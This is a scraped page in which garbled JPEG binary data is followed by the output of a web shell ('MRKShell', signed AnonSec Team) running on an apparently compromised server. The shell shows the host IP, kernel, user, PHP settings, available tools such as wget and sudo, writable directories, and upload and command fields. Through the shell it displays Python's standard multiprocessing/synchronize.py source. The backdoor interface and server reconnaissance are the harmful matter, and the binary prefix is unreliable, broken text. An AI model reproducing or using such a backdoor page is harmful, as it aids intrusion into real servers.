JFIF # -$)%7&).0444#9?92>-240 5+#+4;224;652252222225222220222522225222522;2225222222"B!1AQa"q2B#R3br5CS/!12AQ"aRq#3 ??;}q7:bd%Ո>L8/$rsrQٷf=+e: Rb0Z6pN۰7b 1S`JAT K,-֥7(bNRb9CsD/s,9?}+KA]`,EΞ@@ 3ukq14""tD@D@D@D@D@D@D@D@D@D@D@ȓ|:^Yw-)G%AI/9pwVSнm@6=g7AA5tg18gj>F'J,{C3(q<*#AzX?[$va:Q4SԽ7Uԥ&,c}nF;3mO$DN}RySm\*I"}b%7GLj;gp{{FYs(p_xOJFtStǸMU蓰s95"#H'Uq>7F5[}>v%'Y,&CqMzn}m*Xo vl˳hrӦ V)))g`7$sz^%I-1leE]y%݉>?f}( *BNNñ𜤢S[i'T1 ӥԊ>NlHď~)pKw1.UsD LI/k]Sr\r=ߴMAZNKi+P}| qBS*G*z:Imk\_|l6A7߉H\z0賈'Zt_\u>4 {\#O[ERxzLvP wOLT C0ȴ]BAʷ7uNNINS,(DDDDDDDL8MY݂N$ dMK׭i2FesmNQ=?omKv]OVl^@&pɴ[t5+E`oy.E]Ϳ}$g(7y7&X+imcT\(cHɤ|=. C =yȗXʧpv=&cX*[X_i4 GtfFՓnbMjR@ thv4LO I0zlU-_*G!cH9`nԿ \k-~rS*c[}9]qbi~+%)(h($ s;dՒG_\ё[Q,plq!pEſA RZU0*\n]a~Md_3EZ { &8e:jR*dAkyۛs\B˞0Z5%6e`3;0slSx+Xȇ"*ozkE"vܬWاQ8r @ m5$ [/KNFycgrۑ@ {""""""|xd*@s7o~7BSG|܎vøGtЍL١ѬnK/, f~^~l/Ij+!JI'^;{˚*hӤJarʮ)ڱ[P^$;%.V FLJW̔?2ԭUpJe,~b%iW Yhz̻FAl|3ln"M4kM@$2wmͣp8JY)ݬ.]3vԩİ(P*Tb/1FXTg KŮ*C9jE[69d!GZȩMu!5`H\Cp"=wSAmJjCn&/*Q[kQ~b"zΕ~)aA(2EZ0(FÑp.66_φk}T5 YdRarK ɽLSj"SnR-N-Mz~F^Igb Jq(~X fH'Ӵp5_HN(ܰ,Ȍ䶛DK%a~?FuI}"p=U+j}'p&I_ɑ-x!IٮM:w|q;9M?.6x:ODѪ̬zTL`t^?8xJ$ Q cL4d/_xy ˔ SPGNgwSrrS/`5ӧKj ,hTpI=LѦ(,Pc4*4iESO?5sMz<`&_bsTO)fkX[ xqq::h9ifVۉ\_R }JVg~Jzm`(]:O &6IOghX6+HM 7X]RkUr{HL-"< >~28b{[><@6gF5&\1̹nVŕonZM7 (SF$l\sM];owE+IֹȫzɲDߌPcMQMG)b,N ;*!uo&rHT`s^7įĴz0?P&Ҫ3]@H:hڢFҢM~p{&0s?k}+Ι9׵mw >?"fs+Odٯ̌m(R9T:UpbkW=F*ZQh urk8C8@ҧeUԀyKS '.UP,NBcpFS6n=AJl*7 4<(XY_Cda/D=()b,{yHL>[jrǹ7#M7fO`o/w]GȈEU2f\?7a)#봙݂͠SEg>VRdPfF@PV"Ꮷ_(qCJG_0?1[% NKu$7&ۭ ߡ26U$`/ 3ES:/nek |\tmSg5 س}6/qDT "(*sP4SrX)%T(6y%_ Z9<%]B}oyyY"]76*U*vjijw i3D̍IS \Jnn9ۋ>%o;~)5u56槡'z* B5#5

5#a`,>1TW{Xɘ}G4"ҕ4z5F>e6*[\;%*U0LUUr2cpnݢkɜY͌3+bG0#el۴oe,,jO*M1X/3z)W^,p>s{ İQs:ޝd|w :fIe$~+ajXjnT80'S>KIUP&kNϒT=XlȞNڞ]Yz_K[Qׂގ\gq!nB@IoG *l;_뼳\RUeэkm)qh傢5KNz٘6ba:671k{  $N vfN]S7gxg=VjG;wBx t~l/"ʭl=ԝ6n[Dٛ]@"x)# E):\8Bvkcpv4O*;coJ?4ªMCA'.\zVð'w1USݻSlTyj/ gʕ,:S')ܴ]7!A^b%P׶ٮհU3 o\}XTp,e 597n}dk6UFrVǧ3qaR:BWn>Ѻ}oxKӦK)kܑKL tCs1#?升 v{r:u)?#ZxM=ڝYـ#e}JHBGTG>GsܞG2+~R̅Hש)$[*Hfx-ugx({ I7λwvYm~ |e'X#db@hW,0H8*J5AъA`;jȊY*&sh8Jn]"M>l3z%Րsy=Um'qF sX %,Uv|0W`Gzcy*V0'3R`5ޓ Hڙ>PWbw7;)[U(:krm>/ QU+)P>Hm!r -evY>wT7ԝe)^6_SN⚓ϫ('?2Sj5,[پd|+_Pv'[]t'mΝ2l}z/dz^E|"'J qED)R2ƂSg`9Ոu5~ d!G%>M6%pdcP-P L`ϼTQnA_,24G GneRn,XnߕSzV$ReBfZuE ,Z(yi?vO!clOYA [; c I|vCom+Hꡤ\eaӴ;XS|v4%FcϷAQ[yϢ_s+Ơ&pt}=%^Sb"#gĀ'[ oAUPzr;ȔZTy4t>f種ً>T؟GRgC^-WЖukS,G LV$ܱO餰%cp)[*X_v$@DDӢ3bE-V0֍?zySyadd\ j5": Bxi?;3a]1]ZFD澙rc|8uz/ CȎ3UTqb4'ҥX 6KʖYT2fPe$6 lGzSQTP} OL1q^*rxջQ_K?'?=V MR K IS HERE

MRKShell
Server IP : 104.21.73.244  /  Your IP : 172.71.28.167
Web Server : nginx/1.14.1
System : Linux comtuc2-s-2vcpu-8gb-160gb-intel-nyc3 4.18.0-348.7.1.el8_5.x86_64 #1 SMP Wed Dec 22 13:25:12 UTC 2021 x86_64
User : nginx ( 991)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /lib64/python3.6/multiprocessing/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /lib64/python3.6/multiprocessing/synchronize.py
#
# Module implementing synchronization primitives
#
# multiprocessing/synchronize.py
#
# Copyright (c) 2006-2008, R Oudkerk
# Licensed to PSF under a Contributor Agreement.
#

__all__ = [
    'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore', 'Condition', 'Event'
    ]

import threading
import sys
import tempfile
import _multiprocessing
import time

from . import context
from . import process
from . import util

# Try to import the mp.synchronize module cleanly, if it fails
# raise ImportError for platforms lacking a working sem_open implementation.
# See issue 3770
try:
    from _multiprocessing import SemLock, sem_unlink
except (ImportError):
    raise ImportError("This platform lacks a functioning sem_open" +
                      " implementation, therefore, the required" +
                      " synchronization primitives needed will not" +
                      " function, see issue 3770.")

#
# Constants
#

RECURSIVE_MUTEX, SEMAPHORE = list(range(2))
SEM_VALUE_MAX = _multiprocessing.SemLock.SEM_VALUE_MAX

#
# Base class for semaphores and mutexes; wraps `_multiprocessing.SemLock`
#

class SemLock(object):

    _rand = tempfile._RandomNameSequence()

    def __init__(self, kind, value, maxvalue, *, ctx):
        if ctx is None:
            ctx = context._default_context.get_context()
        name = ctx.get_start_method()
        unlink_now = sys.platform == 'win32' or name == 'fork'
        for i in range(100):
            try:
                sl = self._semlock = _multiprocessing.SemLock(
                    kind, value, maxvalue, self._make_name(),
                    unlink_now)
            except FileExistsError:
                pass
            else:
                break
        else:
            raise FileExistsError('cannot find name for semaphore')

        util.debug('created semlock with handle %s' % sl.handle)
        self._make_methods()

        if sys.platform != 'win32':
            def _after_fork(obj):
                obj._semlock._after_fork()
            util.register_after_fork(self, _after_fork)

        if self._semlock.name is not None:
            # We only get here if we are on Unix with forking
            # disabled.  When the object is garbage collected or the
            # process shuts down we unlink the semaphore name
            from .semaphore_tracker import register
            register(self._semlock.name)
            util.Finalize(self, SemLock._cleanup, (self._semlock.name,),
                          exitpriority=0)

    @staticmethod
    def _cleanup(name):
        from .semaphore_tracker import unregister
        sem_unlink(name)
        unregister(name)

    def _make_methods(self):
        self.acquire = self._semlock.acquire
        self.release = self._semlock.release

    def __enter__(self):
        return self._semlock.__enter__()

    def __exit__(self, *args):
        return self._semlock.__exit__(*args)

    def __getstate__(self):
        context.assert_spawning(self)
        sl = self._semlock
        if sys.platform == 'win32':
            h = context.get_spawning_popen().duplicate_for_child(sl.handle)
        else:
            h = sl.handle
        return (h, sl.kind, sl.maxvalue, sl.name)

    def __setstate__(self, state):
        self._semlock = _multiprocessing.SemLock._rebuild(*state)
        util.debug('recreated blocker with handle %r' % state[0])
        self._make_methods()

    @staticmethod
    def _make_name():
        return '%s-%s' % (process.current_process()._config['semprefix'],
                          next(SemLock._rand))

#
# Semaphore
#

class Semaphore(SemLock):

    def __init__(self, value=1, *, ctx):
        SemLock.__init__(self, SEMAPHORE, value, SEM_VALUE_MAX, ctx=ctx)

    def get_value(self):
        return self._semlock._get_value()

    def __repr__(self):
        try:
            value = self._semlock._get_value()
        except Exception:
            value = 'unknown'
        return '<%s(value=%s)>' % (self.__class__.__name__, value)

#
# Bounded semaphore
#

class BoundedSemaphore(Semaphore):

    def __init__(self, value=1, *, ctx):
        SemLock.__init__(self, SEMAPHORE, value, value, ctx=ctx)

    def __repr__(self):
        try:
            value = self._semlock._get_value()
        except Exception:
            value = 'unknown'
        return '<%s(value=%s, maxvalue=%s)>' % \
               (self.__class__.__name__, value, self._semlock.maxvalue)

#
# Non-recursive lock
#

class Lock(SemLock):

    def __init__(self, *, ctx):
        SemLock.__init__(self, SEMAPHORE, 1, 1, ctx=ctx)

    def __repr__(self):
        try:
            if self._semlock._is_mine():
                name = process.current_process().name
                if threading.current_thread().name != 'MainThread':
                    name += '|' + threading.current_thread().name
            elif self._semlock._get_value() == 1:
                name = 'None'
            elif self._semlock._count() > 0:
                name = 'SomeOtherThread'
            else:
                name = 'SomeOtherProcess'
        except Exception:
            name = 'unknown'
        return '<%s(owner=%s)>' % (self.__class__.__name__, name)

#
# Recursive lock
#

class RLock(SemLock):

    def __init__(self, *, ctx):
        SemLock.__init__(self, RECURSIVE_MUTEX, 1, 1, ctx=ctx)

    def __repr__(self):
        try:
            if self._semlock._is_mine():
                name = process.current_process().name
                if threading.current_thread().name != 'MainThread':
                    name += '|' + threading.current_thread().name
                count = self._semlock._count()
            elif self._semlock._get_value() == 1:
                name, count = 'None', 0
            elif self._semlock._count() > 0:
                name, count = 'SomeOtherThread', 'nonzero'
            else:
                name, count = 'SomeOtherProcess', 'nonzero'
        except Exception:
            name, count = 'unknown', 'unknown'
        return '<%s(%s, %s)>' % (self.__class__.__name__, name, count)

#
# Condition variable
#

class Condition(object):

    def __init__(self, lock=None, *, ctx):
        self._lock = lock or ctx.RLock()
        self._sleeping_count = ctx.Semaphore(0)
        self._woken_count = ctx.Semaphore(0)
        self._wait_semaphore = ctx.Semaphore(0)
        self._make_methods()

    def __getstate__(self):
        context.assert_spawning(self)
        return (self._lock, self._sleeping_count,
                self._woken_count, self._wait_semaphore)

    def __setstate__(self, state):
        (self._lock, self._sleeping_count,
         self._woken_count, self._wait_semaphore) = state
        self._make_methods()

    def __enter__(self):
        return self._lock.__enter__()

    def __exit__(self, *args):
        return self._lock.__exit__(*args)

    def _make_methods(self):
        self.acquire = self._lock.acquire
        self.release = self._lock.release

    def __repr__(self):
        try:
            num_waiters = (self._sleeping_count._semlock._get_value() -
                           self._woken_count._semlock._get_value())
        except Exception:
            num_waiters = 'unknown'
        return '<%s(%s, %s)>' % (self.__class__.__name__, self._lock, num_waiters)

    def wait(self, timeout=None):
        assert self._lock._semlock._is_mine(), \
               'must acquire() condition before using wait()'

        # indicate that this thread is going to sleep
        self._sleeping_count.release()

        # release lock
        count = self._lock._semlock._count()
        for i in range(count):
            self._lock.release()

        try:
            # wait for notification or timeout
            return self._wait_semaphore.acquire(True, timeout)
        finally:
            # indicate that this thread has woken
            self._woken_count.release()

            # reacquire lock
            for i in range(count):
                self._lock.acquire()

    def notify(self):
        assert self._lock._semlock._is_mine(), 'lock is not owned'
        assert not self._wait_semaphore.acquire(False)

        # to take account of timeouts since last notify() we subtract
        # woken_count from sleeping_count and rezero woken_count
        while self._woken_count.acquire(False):
            res = self._sleeping_count.acquire(False)
            assert res

        if self._sleeping_count.acquire(False): # try grabbing a sleeper
            self._wait_semaphore.release()      # wake up one sleeper
            self._woken_count.acquire()         # wait for the sleeper to wake

            # rezero _wait_semaphore in case a timeout just happened
            self._wait_semaphore.acquire(False)

    def notify_all(self):
        assert self._lock._semlock._is_mine(), 'lock is not owned'
        assert not self._wait_semaphore.acquire(False)

        # to take account of timeouts since last notify*() we subtract
        # woken_count from sleeping_count and rezero woken_count
        while self._woken_count.acquire(False):
            res = self._sleeping_count.acquire(False)
            assert res

        sleepers = 0
        while self._sleeping_count.acquire(False):
            self._wait_semaphore.release()        # wake up one sleeper
            sleepers += 1

        if sleepers:
            for i in range(sleepers):
                self._woken_count.acquire()       # wait for a sleeper to wake

            # rezero wait_semaphore in case some timeouts just happened
            while self._wait_semaphore.acquire(False):
                pass

    def wait_for(self, predicate, timeout=None):
        result = predicate()
        if result:
            return result
        if timeout is not None:
            endtime = time.monotonic() + timeout
        else:
            endtime = None
            waittime = None
        while not result:
            if endtime is not None:
                waittime = endtime - time.monotonic()
                if waittime <= 0:
                    break
            self.wait(waittime)
            result = predicate()
        return result

#
# Event
#

class Event(object):

    def __init__(self, *, ctx):
        self._cond = ctx.Condition(ctx.Lock())
        self._flag = ctx.Semaphore(0)

    def is_set(self):
        with self._cond:
            if self._flag.acquire(False):
                self._flag.release()
                return True
            return False

    def set(self):
        with self._cond:
            self._flag.acquire(False)
            self._flag.release()
            self._cond.notify_all()

    def clear(self):
        with self._cond:
            self._flag.acquire(False)

    def wait(self, timeout=None):
        with self._cond:
            if self._flag.acquire(False):
                self._flag.release()
            else:
                self._cond.wait(timeout)

            if self._flag.acquire(False):
                self._flag.release()
                return True
            return False

#
# Barrier
#

class Barrier(threading.Barrier):

    def __init__(self, parties, action=None, timeout=None, *, ctx):
        import struct
        from .heap import BufferWrapper
        wrapper = BufferWrapper(struct.calcsize('i') * 2)
        cond = ctx.Condition()
        self.__setstate__((parties, action, timeout, cond, wrapper))
        self._state = 0
        self._count = 0

    def __setstate__(self, state):
        (self._parties, self._action, self._timeout,
         self._cond, self._wrapper) = state
        self._array = self._wrapper.create_memoryview().cast('i')

    def __getstate__(self):
        return (self._parties, self._action, self._timeout,
                self._cond, self._wrapper)

    @property
    def _state(self):
        return self._array[0]

    @_state.setter
    def _state(self, value):
        self._array[0] = value

    @property
    def _count(self):
        return self._array[1]

    @_count.setter
    def _count(self, value):
        self._array[1] = value

Anon7 - 2022
AnonSec Team